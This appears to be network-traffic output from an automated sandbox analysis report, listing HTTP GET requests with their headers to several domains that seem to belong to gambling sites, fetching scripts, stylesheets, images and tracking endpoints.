Source: global trafficHTTP traffic detected: GET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=wns732.cc&terminal=1&r=3425276221 HTTP/1.1Host: ocsapi-lc.tingmeikj.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://wns732.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: js326.ccConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: com_env=p
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/websocket/CometMarathon.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/websocket/PopUp.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972858650 HTTP/1.1Host: ocsapi-aka.blackkhaki918.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://js326.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/themes/hb/css/pc.css HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/static/js/gb.validation.min.js?v=1717580749344 HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972858649 HTTP/1.1Host: ocsapi-aws.bakeddove.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://js326.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mimlib.wasm HTTP/1.1Host: stt-wasm.ai4funs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://hg679.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wasm_exec.js HTTP/1.1Host: stt-wasm.ai4funs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fiximg/ac-20200404/fileupload/ll12/202312/202312180557505.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://hg679.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/t4091-otherConf-js.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=1707849192 HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=4421600803 HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972856368 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/t4091-index-js.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/bbin_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/pt_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/dg_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/allbet_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=7992680070 HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/public/vendor.dll.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/lib/jquery.min-1.9.1.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: yh8613.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/mg_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/manifest.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/vendor.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/common.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/ag_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/t4045.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: yh8613.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: com_env=p
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/sunbet_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/og_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/gd_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/gc_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /message_zh_CN.js?v=1716975949157 HTTP/1.1Host: e933002.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lt-cloud/stat.do?pv=ajax&pa=host.info&domain=js326.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972860577817 HTTP/1.1Host: ocsapi-aka.blackkhaki918.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://js326.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/static/css/gb.validation.min.css HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/lebo_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/app/h5_icon.png.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/app/04.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/app/02.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/app/03.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
